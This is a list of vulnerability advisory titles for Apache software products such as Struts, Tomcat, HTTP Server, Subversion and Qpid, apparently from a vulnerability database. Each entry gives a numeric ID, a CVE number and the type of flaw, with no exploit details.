| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
| [91736] Apache XML-RPC Multiple Security Vulnerabilities
| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
| [90482] Apache CVE-2004-1387 Local Security Vulnerability
| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
| [86399] Apache CVE-2007-1743 Local Security Vulnerability
| [86397] Apache CVE-2007-1742 Local Security Vulnerability
| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
